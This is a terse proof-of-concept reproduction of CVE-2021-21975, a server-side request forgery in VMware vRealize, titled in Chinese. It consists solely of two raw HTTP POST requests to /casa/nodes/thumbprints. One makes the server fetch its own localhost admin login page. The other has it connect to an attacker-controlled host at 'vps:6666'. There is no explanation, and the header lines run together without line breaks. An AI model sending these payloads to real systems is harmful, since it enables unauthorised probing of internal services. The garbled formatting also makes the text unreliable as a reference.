CVE-2021-21975​：VMware vRealize SSRF复现

POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["127.0.0.1:443/admin/login.action"]

POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["vps:6666"]